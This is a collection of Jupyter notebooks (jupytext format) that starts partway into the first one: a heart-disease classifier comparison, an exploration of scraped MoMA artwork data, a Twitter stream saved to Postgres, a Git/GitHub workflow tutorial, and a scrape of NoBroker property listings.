# From the above correlation plot we see that cp (chest pain), thalach and slope are the features most correlated with the target.
# # EDA (Exploratory Data Analysis)
# + _uuid="00af1961381609399dd80ca7c6a950277c120357"
# Class balance of the target (0 = no disease, 1 = disease).
df.target.value_counts()
# + _uuid="f0c639a82d794e41978199f7fa4405a01a7b805e"
sns.countplot(x="target", data=df, palette="bwr")
plt.show()
# + _uuid="dd20ffc31d87de07a6f2941b0500cda8c0b1b8e6"
countNoDisease = len(df[df.target == 0])
countHaveDisease = len(df[df.target == 1])
print("Percentage of Patients Haven't Heart Disease: {:.2f}%".format((countNoDisease / (len(df.target))*100)))
print("Percentage of Patients Have Heart Disease: {:.2f}%".format((countHaveDisease / (len(df.target))*100)))
# + _uuid="aca4074785c40bcf036a59c14c78e3a503904724"
# Sex distribution of the cohort.
sns.countplot(x='sex', data=df, palette="mako_r")
plt.xlabel("Sex (0 = female, 1= male)")
plt.show()
# + _uuid="8780860cb02768a3bf112a41ab67f1f6bebe9146"
countFemale = len(df[df.sex == 0])
countMale = len(df[df.sex == 1])
print("Percentage of Female Patients: {:.2f}%".format((countFemale / (len(df.sex))*100)))
print("Percentage of Male Patients: {:.2f}%".format((countMale / (len(df.sex))*100)))
# + _uuid="435f8691396c6f2b1a901809286eb64112126582"
# Feature means split by disease status.
df.groupby('target').mean()
# + _uuid="e0eed947b5490e93a43515ad6d2a6af9713f16ce"
# Disease frequency per age.
pd.crosstab(df.age,df.target).plot(kind="bar",figsize=(20,6))
plt.title('Heart Disease Frequency for Ages')
plt.xlabel('Age')
plt.ylabel('Frequency')
plt.savefig('heartDiseaseAndAges.png')
plt.show()
# + _uuid="1cb0e9e4ec00ca7caa2e77a03dd0289e1c549708"
# Disease frequency per sex.
pd.crosstab(df.sex,df.target).plot(kind="barh",figsize=(15,6),color=['#1CA53B','#AA1111' ])
plt.title('Heart Disease Frequency for Sex')
plt.xlabel('Sex (0 = Female, 1 = Male)')
plt.xticks(rotation=0)
plt.legend(["Haven't Disease", "Have Disease"])
plt.ylabel('Frequency')
plt.show()
# + _uuid="e5fe0744106dc26475e2e0274081789518ad8a51"
# Max heart rate vs. age, colored by disease status.
plt.scatter(x=df.age[df.target==1], y=df.thalach[(df.target==1)], c="red")
plt.scatter(x=df.age[df.target==0], y=df.thalach[(df.target==0)])
plt.legend(["Disease", "Not Disease"])
plt.xlabel("Age")
plt.ylabel("Maximum Heart Rate")
plt.show()
# + _uuid="730062aa471d6774f0b761ad2cb6a7043d339615"
pd.crosstab(df.slope,df.target).plot(kind="bar",figsize=(15,6),color=['#DAF7A6','#FF5733' ])
plt.title('Heart Disease Frequency for Slope')
plt.xlabel('The Slope of The Peak Exercise ST Segment ')
plt.xticks(rotation = 0)
plt.ylabel('Frequency')
plt.show()
# + _uuid="3209c3a2fe67592b6ff6851327e98ac7606e14eb"
pd.crosstab(df.fbs,df.target).plot(kind="bar",figsize=(15,6),color=['#FFC300','#581845' ])
plt.title('Heart Disease Frequency According To FBS')
plt.xlabel('FBS - (Fasting Blood Sugar > 120 mg/dl) (1 = true; 0 = false)')
plt.xticks(rotation = 0)
plt.legend(["Haven't Disease", "Have Disease"])
plt.ylabel('Frequency of Disease or Not')
plt.show()
# + _uuid="10be6f01d184480eca7437799c214b4847fd3543"
pd.crosstab(df.cp,df.target).plot(kind="bar",figsize=(15,6),color=['#11A5AA','#AA1190' ])
plt.title('Heart Disease Frequency According To Chest Pain Type')
plt.xlabel('Chest Pain Type')
plt.xticks(rotation = 0)
plt.ylabel('Frequency of Disease or Not')
plt.show()
# -
# # Dummy variables
# One-hot encode the three multi-level categorical columns so linear models
# don't treat their codes as ordered magnitudes.
a = pd.get_dummies(df['cp'], prefix = "cp")
b = pd.get_dummies(df['thal'], prefix = "thal")
c = pd.get_dummies(df['slope'], prefix = "slope")
# + _uuid="50380d91358131ae6b852c9666e4da5c2e4dee66"
frames = [df, a, b, c]
df = pd.concat(frames, axis = 1)
df.head()
# + _uuid="01011d45333bde3d9f95e3db93ae4517c72a741f"
# Drop the originals now that the dummy columns exist.
df = df.drop(columns = ['cp', 'thal', 'slope'])
df.head()
# -
X = df.drop(['target'], axis = 1)
y = df.target.values
# # Train & Test split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=0)
# # Scaling
from sklearn.preprocessing import StandardScaler
# Fit the scaler on the training split only; reuse it on the test split to
# avoid leaking test statistics into training.
sc_X=StandardScaler()
X_train=sc_X.fit_transform(X_train)
X_test=sc_X.transform(X_test)
# # Building Predictive Model
#LogisticRegression
lr_c=LogisticRegression(random_state=0)
lr_c.fit(X_train,y_train)
lr_pred=lr_c.predict(X_test)
lr_cm=confusion_matrix(y_test,lr_pred)
lr_ac=accuracy_score(y_test, lr_pred)
print('LogisticRegression_accuracy:\t',lr_ac)
print('Confusion Matrix:\n', lr_cm)
#SVM classifier (RBF kernel)
svc_c=SVC(kernel='rbf')
svc_c.fit(X_train,y_train)
svc_pred=svc_c.predict(X_test)
sv_cm=confusion_matrix(y_test,svc_pred)
sv_ac=accuracy_score(y_test, svc_pred)
print('SVM_classifier_accuracy:\t',sv_ac)
print('Confusion Matrix:\n', sv_cm)
#Bayes (Gaussian naive Bayes)
gaussian=GaussianNB()
gaussian.fit(X_train,y_train)
bayes_pred=gaussian.predict(X_test)
bayes_cm=confusion_matrix(y_test,bayes_pred)
bayes_ac=accuracy_score(bayes_pred,y_test)
print('Bayes_accuracy:\t\t\t',bayes_ac)
#RandomForest (10 trees, entropy criterion)
rdf_c=RandomForestClassifier(n_estimators=10,criterion='entropy',random_state=0)
rdf_c.fit(X_train,y_train)
rdf_pred=rdf_c.predict(X_test)
rdf_cm=confusion_matrix(y_test,rdf_pred)
rdf_ac=accuracy_score(rdf_pred,y_test)
print('RandomForest_accuracy:\t\t',rdf_ac)
# DecisionTree Classifier
dtree_c=DecisionTreeClassifier(criterion='entropy',random_state=0)
dtree_c.fit(X_train,y_train)
dtree_pred=dtree_c.predict(X_test)
dtree_cm=confusion_matrix(y_test,dtree_pred)
dtree_ac=accuracy_score(dtree_pred,y_test)
print('DecisionTree_accuracy:\t\t',dtree_ac)
#KNN (k=2)
knn=KNeighborsClassifier(n_neighbors=2)
knn.fit(X_train,y_train)
knn_pred=knn.predict(X_test)
knn_cm=confusion_matrix(y_test,knn_pred)
knn_ac=accuracy_score(knn_pred,y_test)
print('KNN_accuracy:\t\t\t',knn_ac)
print(knn_cm)
# Confusion matrices for all six models in one 2x3 grid.
plt.figure(figsize=(15,10))
plt.subplot(2,3,1)
plt.title("LogisticRegression_cm")
sns.heatmap(lr_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.subplot(2,3,2)
plt.title("bayes_cm")
sns.heatmap(bayes_cm,annot=True,cmap="Oranges",fmt="d",cbar=False)
plt.subplot(2,3,3)
plt.title("RandomForest")
sns.heatmap(rdf_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.subplot(2,3,4)
plt.title("SVM_classifier_cm")
sns.heatmap(sv_cm,annot=True,cmap="Reds",fmt="d",cbar=False)
plt.subplot(2,3,5)
plt.title("DecisionTree_cm")
sns.heatmap(dtree_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.subplot(2,3,6)
plt.title("kNN_cm")
sns.heatmap(knn_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.show()
# Horizontal bar chart comparing test accuracy across the six models.
model_accuracy = pd.Series(data=[lr_ac,sv_ac,bayes_ac,rdf_ac,dtree_ac,knn_ac],
                index=['LogisticRegression','SVM_classifier','Bayes',
                      'RandomForest','DecisionTree_Classifier','KNN'])
fig= plt.figure(figsize=(10,7))
model_accuracy.sort_values().plot.barh()
# Fixed typo in the chart title ('Accracy' -> 'Accuracy').
plt.title('Model Accuracy')
|
Heart Disease Prediction/Heart Disease Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # More Explorations with MoMA Scrape
#
# 
#
# This notebook further explores web data scraped from the MoMA collection.
#
# The [previous notebook](https://github.com/tnakatani/python2_ccac/blob/master/wk_8/moma_scrape/moma_scrape.ipynb) explored scraped data of specific artists. This time, the script was revised to randomly sample artworks from the collection in order to explore trends in the larger collection.
#
# ## Step 1: Data Collection
#
# The [moma_scrape.py](moma_scrape.py) script created an artwork dataset with the following steps:
# 1. NumPy's [`randint`](https://numpy.org/doc/stable/reference/random/generated/numpy.random.randint.html?highlight=randint#numpy.random.randint) method creates a list of random integers.
# 2. The `ArtworkSoup` class contains a method `scrape`, which takes the integers as a parameter. The class subsequently builds a URL with the integer and makes a HTTP request. Both successful and unsuccessful HTTP calls are logged in a separate `scrape.log` file.
# 3. If the HTTP request is successful, the class instantiates a `BeautifulSoup` object, extracts relevant artwork data from the HTML and builds a data structure from it.
# 4. Once all HTTP calls are made, the resulting data structure is dumped to a CSV file.
#
# __One flaw in the method__: Each integer in the 300K list of random integer does not necessarily guarantee a a valid request. It was not clear to me how the MoMA site assigns these artwork URL IDs, so I attempted to throw a large number of a randomized sample and see how many valid requests I can receive. Using the scraping logs, I calculated the rate of 404 errors:
#
# ```python
# with open('scrape.log', 'r') as f:
# count = 0
# count_404 = 0
# for line in f:
# count += 1
# if 'INFO:root:404' in line:
# count_404 += 1
# print(f'Total HTTP requests resulting in 404 response: {count_404}')
# print(f'Total HTTP requests: {count}')
# print(f'Ratio of 404 response versus 200: {count_404/count*100:.2f}%')
#
# # Total requests resulting in 404: 17567
# # Total HTTP requests: 30000
# # Ratio of 404 response versus 200: 58.56%
# ```
#
# Thus, more than half of the 300K requests resulted in a 404 error!
# ## Step 2: Data Exploration
#
# Now that we have the scraped data, we can explore it as a dataframe.
import pandas as pd
import matplotlib.pyplot as plt
# %matplotlib inline
# +
# Import the CSV into a dataframe
df = pd.read_csv('data/artwork_data.csv', index_col=0)
# Always show all of the columns
pd.set_option('display.max_columns', None)
# View a sample of the data (drop columns that are entirely NaN for this sample)
df.sample(10).dropna(how='all', axis=1)
# -
# While scraping the data, I noticed that the artworks had a wide range in the amount of metadata - ranging from common keys (e.g. "artist", "title") to less common ("producer", "delineator").
# Inspect all the features (columns) present in the scraped artwork data
df.keys()
# I also forgot to add a URL for each of the artworks. Since we have the artwork ID, we can concatenate that with the URL template
# Create a column of URLs from artwork IDs.
# (Plain string literal: there are no placeholders, so the f-prefix the
# original carried was a no-op and has been removed.)
url = 'https://www.moma.org/collection/works/'
df['url'] = df['id'].apply(lambda x: url + str(x))
df['url'].head()
# ### Sorting Values by Frequency
# A typical way to inspect categorical data like this is to calculate the relative occurrence of unique values. This will answer questions like, "What artist do we most frequently see in this dataset?" and more.
#
# Using `value_counts()` and `pd.concat()`, we can view both the raw count as well as the relative frequency of each unique value.
# Clean up the state/variant column as it causes the loop to break because of its slash
df = df.rename(columns={'state/variant':'state_variant'})
# Print value counts for each column, then save each aggregation as a CSV file.
# (df.keys()[1:] skips the first column, the artwork id.)
for k in df.keys()[1:]:
    # Assign both raw counts and relative frequencies to variables
    count = df[k].value_counts(dropna=True)
    freq = df[k].value_counts(normalize=True, dropna=True)
    # Concatenate the two series into a dataframe
    values_combined = pd.concat([count, freq], keys=['count','frequency'], axis=1)
    # Save each dataframe as its own CSV file
    values_combined.reset_index() \
                   .rename(columns={'index': k}) \
                   .to_csv(f'data/{k}.csv')
    # Print results here
    banner = f'{k.upper()} - Total Unique Values: {len(count)}'
    print(banner)
    print(values_combined.head(10), '\n')
# Some of the more interesting data points from the cursory view of the data:
# 1. __Pablo Picasso's__ works were the most represented, with a relative frequency of ~5%.
# 2. The most common artwork title is __"Vase"__, but the frequency distribution has quite a long tail.
# 3. The most common manufacturer is __Braun AG__ [wiki](https://en.wikipedia.org/wiki/Braun_(company)). [Here](https://www.moma.org/collection/works/3391) is an example of a Braun product they have in the collection.
# 4. The most common medium is a __lithograph__, and its most common printer is [__Mourlot__](https://en.wikipedia.org/wiki/Mourlot_Studios), a commercial print shop founded in 1852 by the Mourlot family and located in Paris, France.
# ### Grouping Dimensions for New Perspectives
#
# There are some data points that are easily observed by looking at value counts. We can dive a bit deeper into the data by grouping columns together.
#
# First off, we will be querying various keywords in each column, so let's make a simple helper function so we can type less repetitive commands:
def query_df(column, keyword):
    """Fuzzy match a dataframe column by a keyword, case-insensitively.

    Both the column values and *keyword* are lower-cased before matching, so
    callers may pass mixed-case search terms (the original lower-cased only
    the column, which made any keyword containing an uppercase letter
    unmatchable). Returns a clean dataframe by dropping columns that are
    entirely NaN in the matched rows.
    """
    return df.loc[df[column].str.lower() \
        .str.contains(keyword.lower(), na=False)] \
        .dropna(how='all', axis=1)
# Using this function we can query data we saw in the value counts to the full artwork data.
#
#
# #### Exploring Artist Works
# For instance, let's take a look at all the artwork whose manufacturer is Braun:
# Query artwork manufactured by Braun
query_df('manufacturer', 'braun').head()
# [<NAME>](https://en.wikipedia.org/wiki/Dieter_Rams) is a famous industrial designer in the modern design world known for products he designed for the Braun company. Let's see what artwork they have by him:
dieter_rams = query_df('artist', '<NAME>')
dieter_rams.head()
# We can group the artworks by how they were added to the collection by referring to the "credit" column:
dieter_rams['credit'].value_counts()
# Let's see artworks printed by the Mourlot company:
mourlot = query_df('printer', 'mourlot')
mourlot
# There are 425 artworks printed by the Mourlot company. An interesting angle to look at this data is to investigate __how the artworks printed by Mourlot were acquired__ (by using the `credit` column), and __how many of each artist's work were acquired from the credited source__.
# Group the dataframe by donor and artist, then sort the result by number of works.
group = mourlot.groupby(['credit','artist'])['id']
group.count().reset_index().sort_values(by='id', ascending=False).head(10)
# Based on the query, the top three artworks printed by the Mourlot company acquired from the Lous E. Stern Collection were works by <NAME>, <NAME> and <NAME>.
# ## Step 3: Visualization
# This section shows the distribution of copyright owners among the scraped artwork data.
#
# ### Cleaning the Data
#
# Before visualization, I noticed that the copyright claims are prefixed by the year. Since I am only interested in the group entities, I will first clean the data by removing the copyright year string.
# This is how the data looks at the time of scraping
df['copyright'].dropna().head(10)
# Remove the copyright year from the strings:
# lookbehind matches "© YYYY ", capture everything up to (lookahead) the "/" suffix.
cp = df['copyright'].str.extract('(?<=© [0-9]{4} )(.*)(?=/.*)')
# Concatenate the raw count and the relative frequency,
# and reset the index
cp_count = cp[0].value_counts(dropna=True)
cp_freq = cp[0].value_counts(normalize=True, dropna=True)
cp_concat = pd.concat([cp_count, cp_freq], keys=['count','frequency'], axis=1) \
    .reset_index() \
    .rename(columns={'index': 'copyright'})
# Now we have a workable dataframe with more meaningful value counts
cp_concat.head(10)
# ### Plotting the Data
#
# We can now transform the dataframe into a plot using matplotlib.
# +
# Plotting all the data is too long of a tail, shorten to top 20
cp_20 = cp_concat.head(20)
fig = plt.figure(figsize=(5,5))
plt.barh(cp_20['copyright'], width=cp_20['frequency']);
plt.title('Distribution of the Top 20 Copyright Owners from Scraped Artwork Data')
plt.ylabel('Copyright')
plt.xlabel('Relative Frequency')
# -
# The main finding is that more than half of the artwork that I scraped is copyrighted by the [Artist Rights Society (ARS)](https://arsny.com/) of New York.
#
# More info on the organization from their [wiki page](https://en.wikipedia.org/wiki/Artists_Rights_Society):
# > Artists Rights Society (ARS) is a copyright, licensing, and monitoring organization for visual artists in the United States. Founded in 1987, ARS is a member of the International Confederation of Societies of Authors and Composers and as such represents in the United States the intellectual property rights interests of over 80,000 visual artists and estates of visual artists from around the world (painters, sculptors, photographers, architects and others).
|
final_project/moma_scrape_exploration.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Twitter Pull using Twython
# ### Author: <NAME>
# ### Additions: <NAME>
# ### Last Update Date: 4-16-21
# ### adding SQL
# +
from twython import Twython
# REST client. NOTE(review): the four credential strings (app key, app
# secret, OAuth token, OAuth token secret) were blanked before publishing —
# supply real credentials before use.
twitter = Twython('',
                  '',
                  '',
                  '')
#twitter.get_home_timeline()
#twitter.search(q='@NBATopShot+AND+Giveaway')
# +
from twython import TwythonStreamer
import csv
import codecs
import json
import time
# Filter out unwanted data
def process_tweet(tweet):
    """Flatten a raw Twitter status payload into the subset of fields we store.

    Pulls the hashtag texts plus selected tweet- and user-level attributes
    out of the nested JSON structure and returns them as a flat dict.
    """
    author = tweet['user']
    return {
        'hashtags': [tag['text'] for tag in tweet['entities']['hashtags']],
        'tweet_id': tweet['id'],
        'created_at': tweet['created_at'],
        'text': tweet['text'],
        'name': author['name'],
        'user': author['screen_name'],
        'user_id': author['id'],
        'user_loc': author['location'],
        'user_desc': author['description'],
        'user_followers': author['followers_count'],
        'user_friends': author['friends_count'],
        'user_listed': author['listed_count'],
        'user_created': author['created_at'],
        'user_favs': author['favourites_count'],
        'user_verified': author['verified'],
        'user_statuses': author['statuses_count'],
    }
# Create a class that inherits TwythonStreamer
class MyStreamer(TwythonStreamer):
    """Streaming consumer: filters English tweets and persists them to Postgres."""
    # Received data
    def on_success(self, data):
        # Save full JSON to file
        # NOTE(review): 'w' mode means only the most recent tweet's JSON is
        # kept — each callback overwrites the file.
        with open('topGiveaway.json', 'w') as jsonfile:
            json.dump(data, jsonfile)
        # Only collect tweets in English
        if data['lang'] == 'en':
            tweet_data = process_tweet(data)
            self.write_to_pgadmin(tweet_data)
        #would call mongo function here to write it to the database
    # Problem with the API
    def on_error(self, status_code, data):
        print(status_code, data)
        self.disconnect()
    # Save each tweet to csv file
    # (currently unused; write_to_pgadmin is the active sink)
    def save_to_csv(self, tweet):
        with open('topgiveaway.csv', 'a', encoding="utf8") as file:
            writer = csv.writer(file)
            writer.writerow(list(tweet.values()))
    def write_to_pgadmin(self,tweet):
        """Insert the flattened tweet into the twitter_user / twitter_tweet tables."""
        # NOTE(review): a new connection is opened per tweet — consider
        # pooling/reusing a connection if throughput matters.
        import psycopg2
        # NOTE(review): '<PASSWORD>' is a redaction placeholder (not valid
        # Python) — restore the real password or load it from config before
        # running this cell.
        conn = psycopg2.connect(host="localhost",
            database="top-twit-mapping",
            port=5432,
            user='postgres',
            password=<PASSWORD>)
        cur = conn.cursor()
        # no-op self-assignment, kept as-is
        tweet = tweet
        # insert user information; ON CONFLICT keeps the first-seen user row
        command = '''INSERT INTO twitter_user (realname,username,user_id,user_loc,user_desc,user_followers,user_friends,user_listed,user_created,user_favs,user_verified,user_statuses) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) ON CONFLICT
        (user_id) DO NOTHING;'''
        cur.execute(command,(tweet['name'],tweet['user'],tweet['user_id'],tweet['user_loc'],tweet['user_desc'],tweet['user_followers'],tweet['user_friends'],tweet['user_listed'],tweet['user_created'],tweet['user_favs'],tweet['user_verified'],tweet['user_statuses']))
        # insert the tweet itself, keyed by tweet_id
        command2 = '''INSERT INTO twitter_tweet (tweet_id,created_at,tweet,user_id) VALUES (%s,%s,%s,%s) ON CONFLICT
        (tweet_id) DO NOTHING;'''
        cur.execute(command2,(tweet['tweet_id'],tweet['created_at'],tweet['text'],tweet['user_id']))
        conn.commit()
        cur.close()
        conn.close()
# Main loop: keep the stream alive, restarting after transient failures.
while True:
    try:
        # Instantiate from our streaming class
        # NOTE(review): the four Twitter API credentials are blank here and
        # must be supplied (or loaded from config) for the stream to connect.
        stream = MyStreamer('','','','')
        # Start the stream
        stream.statuses.filter(track='@NBATopShot,Giveaway') #Track uses comma separated list
    except (KeyboardInterrupt):
        # Manual stop: leave the loop entirely.
        print('Exiting')
        break
    except Exception as e:
        # Any other failure (network, rate limit, ...): wait a minute, reconnect.
        print("error - sleeping " + str(e))
        time.sleep(60)
        continue
# -
|
toSQL.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .sh
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Bash
# language: bash
# name: bash
# ---
# <div id="body">
# <center>
# <a href="08 Conflicts.ipynb"> <font size="8"> < </font></a>
# <a href="index.ipynb"> <font size="6"> Version Control with Git </font> </a>
# <font size="6"> > </font>
# </center>
# </div>
# # **Notes on the use of GIT and GitHub**
# + [markdown] toc-hr-collapsed=false
# ## **One time only**
# -
# ### **Fork**
#
# First fork the ORG/repository in the GitHub UI to your_GH_account. This is the same as what GitHub documentation suggests. See: [Fork a repo](https://help.github.com/en/articles/fork-a-repo) and [Syncing a fork](https://help.github.com/en/articles/syncing-a-fork) in GitHub help.
#
# Note: add SSH key, see [GitHub documentation](https://help.github.com/en/articles/connecting-to-github-with-ssh).
#
# #### **Origin**
#
# ```bash
# # "origin" points to your fork repo (e.g. forked from git@github.com:org/repository.git) - IMPORTANT
# git clone git@github.com:your_GH_account/repository.git
# ```
# ### **Remote**
# ```bash
# # add "upstream" remote
# cd repository/
# git remote add upstream <EMAIL>:org/repository.git
#
# git remote -v
# # you should see something like
# origin git@github.com:your_GH_account/repository.git (fetch)
# origin <EMAIL>:your_GH_account/repository.git (push)
# upstream <EMAIL>:org/repository.git (fetch)
# upstream <EMAIL>:org/repository.git (push)
# ```
# + [markdown] toc-hr-collapsed=false
# ## **Working with git**:
#
#
# -
# ### Editing
# ```bash
# # <make local source code changes>
# vim ...
# ```
#
#
# ### `git fetch`
# ```bash
# # fetch all branches from all remotes
# git fetch --all
# ```
#
#
# ### `git branch`
# ```bash
# # list existing branches
# git branch -a
# ```
#
#
# ### `git checkout`
# ```bash
# # create new local branch (pick a new name for feature_branch_name)
# git checkout -b feature_branch_name
# ```
#
#
# ### `git status`
# ```bash
# # list local changes
# git status
# ```
#
#
# ### `git add`
# ```bash
# # add files and/or changes into the repository
# git add file1.c file2.py ...
# ```
#
# ### `git commit`
# ```bash
# # commit
# git commit -m 'my change with reasonable explanation...'
# ```
# ### `git push`
# ```bash
# # push feature branch to origin, i.e. your fork of the org/repository repo
# git push origin feature_branch_name
# ```
# + [markdown] toc-hr-collapsed=true
# ### Pull Request
#
# * create pull request in GitHub Web interface (the link is then shown in the terminal)
#
# * during PR review phase, make more local changes if needed
#
# ```bash
# git add .
# git commit -m 'my second change'
# git push origin feature_branch_name
# # ..... will be added to existing pull request
# ```
#
# * NOTE: for different pull requests, simply create different feature branches.
#
# -
# ## **Keep your local source code up to date**
#
# [from https://github.com/OSGeo/gdal/blob/master/CONTRIBUTING.md#working-with-a-feature-branch]
#
# You may need to resynchronize against master if you need some bugfix or new capability that has been added since you created your branch
#
# ### `git rebase`
# ```bash
# # assuming that "upstream" points to org/repository
# git fetch upstream
# git rebase upstream/master
# ```
#
# ### `git stash`
# ```bash
# # if rebase fails with "error: cannot rebase: You have unstaged changes...", then move your uncommitted local changes to "stash"
# git stash
# # now you can rebase
# git rebase upstream/master
# # apply your local changes on top
# git stash pop   # re-applies the stashed changes and drops them from the stash (running "apply" and then "pop" would apply them twice)
# ```
#
# Continue do your changes and commit/push them (ideally to a feature branch, see above).
#
#
# + [markdown] toc-hr-collapsed=true
# ## Working on private repository
#
# Assuming you are working on your own repository, direct pushes can be used (instead of forking and pull requests):
#
# ### One time only:
#
# ```bash
# # "origin" points to your repo - no fork needed
# git clone git@github.com:your_GH_account/repository.git
# ```
#
# ### **Work with git:**
#
# ```bash
# # <make local source code changes>
# vim ...
#
# # list local changes
# git status
# git add file1.c file2.py ...
# git commit -m 'my change with reasonable explanation...'
#
# # assuming that "origin" points to your_git_account/repository
# git fetch origin
# # IMPORTANT - ALWAYS REBASE IN ORDER TO AVOID NOT NEEDED MERGE COMMITS (!!!)
# git rebase origin/master
#
# # push feature branch to origin, i.e. directly to your_git_account/repository
# git push origin
# ```
#
# #### **Switching between branches**
# For an elegant way of multi-branches in separate directories with only a single repo clone, see
#
# * https://lists.osgeo.org/pipermail/grass-dev/2019-May/092653.html
#
# * Fixing bugs in a release branch
#
# To directly fix bugs (ideally via feature branch), do
#
# ```bash
# # push to release_branch, we assume it to be checked out
#
# # M_m (Major, minor version number: i.e.: V 1.3)
# cd releasebranch_M_m/
# # be sure to locally have all updates from server
# git fetch --all
# git branch --merged
#
# # create feature branch
# git checkout -b rMm_fix_xxx
#
# # ... do changes...
#
# git status
# git add ...
# git commit -m 'useful commit msg...'
#
# # push to feature branch
# git push upstream rMm_fix_xxx
#
# # create PR in GitHub UI. IMPORTANT: switch there to release_branch_X_Y!
#
# # ... after review, merge:
#
# # switch to release branch
# git checkout releasebranch_M_m
#
# # be sure to locally have all updates
# git fetch --all
# git branch --merged
#
# git branch -D rMm_fix_xxx   # delete the merged feature branch created above
# git fetch --all --prune
# git branch -a
# ```
#
# #### **Backporting to release branches**
# * **Preparation**
# If you checked out the release branch into a separate directory, be sure to have "upstream" enabled as a remote:
#
# ```bash
# git remote -v
# # if upstream is missing, execute
# git remote add upstream <EMAIL>:org/repository.git
# ```
#
# #### **Backporting of a single commit**
#
# ```bash
# git checkout master
# # With git log, identify the sha1sum of the commit you want to backport (example: into releasebranch_M_m)
# git log
#
# # switch to branch
# git checkout releasebranch_M_m
#
# # first update local repo
# git pull origin releasebranch_M_m --rebase
#
# # now backport the commit (edit conflicts if needed)
# git cherry-pick the_sha1_sum
#
# # push backport to upstream
# git push upstream releasebranch_M_m
# ```
#
# See also https://github.com/OSGeo/gdal/blob/master/CONTRIBUTING.md#backporting-bugfixes-from-master-to-a-stable-branch
#
# #### **Backporting of a merged pull request from master**
# Same as "Backporting of single commits" but with multiple git cherry-pick .... Importantly, in the right order.
#
# TODO: there must be a better way!!
#
# #### **Made a mess? Fix it**
#
# Example: mess happened on releasebranch_M_m:
#
# ```bash
# git reset --hard upstream/releasebranch_M_m
# git pull upstream releasebranch_M_m --rebase
# # now all should be clean again
# ```
#
#
# #### **Merging of Pull Requests**
#
# Rationale: We should try to have clean history and good commit messages. This helps really a lot when you try to understand why something is implemented the way it is.
#
# When a Pull Requests (PR) has multiple commits, the merge commit is more or less mandatory because if you don't have it, you can't use `git revert`.
#
# #### **PR with single commit**
# Proposed: when a PR only has a single commit, the "merge commit" doesn't offer anything and it can be avoided by rebasing the feature branch:
#
# Workflow: GitHub > button "Merge pull request" > "Rebase and merge"
#
# Next, you may locally delete the feature branch.
#
# #### **PR with multiple commits**
#
# #### **Proposed**: it is a good idea to try to squash the accumulated commits in a PR before merging, especially if those are trivial fixes.
#
# As an example, PRxx contains 5 commits. Esp. in case that several commits of them are trivial fixes that only add noise to the history, "squashing" those results in a cleaner history and, among other things, makes it easier to use `git bisect` and `git blame`.
#
# Importantly, not always commits of each and every PR need to be squashed before merging. When extensive changes are being made, it often makes sense to keep them unsquashed (e.g. to make reviewing easier), but trivial fixes should still be squashed to the main commits.
#
# Further reading
# Git Cheatsheet: http://ndpsoftware.com/git-cheatsheet.html#loc=workspace; (click on a field to see the related git commands)
# GDAL contributing: https://github.com/OSGeo/gdal/blob/master/CONTRIBUTING.md
#
#
# -- These notes are heavily based on https://trac.osgeo.org/grass/wiki/HowToGit and should be considered a draft / work-in-progress starting point on how to make good use of Git.
#
#
# -
# <div id="body">
# <center>
# <a href="08 Conflicts.ipynb"> <font size="4"> < </font></a>
# <a href="index.ipynb"> <font size="4"> Version Control with Git </font> </a>
# <font size="4"> > </font>
# </center>
# </div>
|
09 Git Tips.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
## First, we send the request to the server.
from bs4 import BeautifulSoup
import requests
# Download the NoBroker search-results page (4-BHK sales in Electronic City, Bangalore).
page=requests.get('https://www.nobroker.in/property/sale/bangalore/Electronic%20City?type=BHK4&searchParam=W3sibGF0IjoxMi44N%20DUyMTQ1LCJsb24iOjc3LjY2MDE2OTUsInBsYWNlSWQiOiJDaElKdy1GUWQ0cHNyanNSSGZkYXpnXzhYRW8%20iLCJwbGFjZU5hbWUiOiJFbGVjdHJvbmljIENpdHkifV0=&propertyAge=0&radius=2.0')
page  # notebook display: the Response object (shows the HTTP status)
soup= BeautifulSoup(page.content)  # parse the HTML document
# NOTE(review): the CSS class names below (nb__...) look build-generated and
# may change when the site is redeployed; selectors could then return None/[].
nan=soup.find('h2',class_="heading-6 font-semi-bold nb__25Cl7")  # first listing title element
nan
nan.text
square_feet=soup.find('div',class_="nb__FfHqA")  # first listing's area element
square_feet
square_feet.text
house_title=soup.find('h2',class_="heading-6 font-semi-bold nb__25Cl7")  # same selector as `nan`
house_title
house_title.text
location=soup.find('div',class_="nb__1EwQz")  # first listing's location element
location
location.text
# +
# Collect the text of every price/EMI element on the page.
name =[] # give empty list here
for i in soup.find_all('div',class_="font-semi-bold heading-6"):
    name.append(i.text)
# -
# +
# Collect the area (square feet) string of every listing.
square_feet =[] # give empty list here
for i in soup.find_all('div',class_="nb__FfHqA"):
    square_feet.append(i.text)
square_feet
# +
# Collect every listing title.
house_title =[] # give empty list here
for i in soup.find_all('h2',class_="heading-6 font-semi-bold nb__25Cl7"):
    house_title.append(i.text)
house_title
# +
# Collect every listing location.
location =[] # give empty list here
for i in soup.find_all('div',class_="nb__1EwQz"):
    location.append(i.text)
location
# +
# Collect the secondary location/detail strings.
locati =[] # give empty list here
for i in soup.find_all('div',class_="nb__4L90a"):
    locati.append(i.text)
locati
# -
# Copy of `locati` without its first element — presumably a header entry;
# verify against the rendered page.
po=[]
for i in range(1, len(locati),1):
    po.append(locati[i])
po
# +
# Same price/EMI texts again, gathered into a single list.
full_info = []
detail = soup.find_all('div',class_="font-semi-bold heading-6")
for i in detail:
    full_info.append(i.text)
full_info
# -
emi=[]
rate=[]
full_info=[]
# +
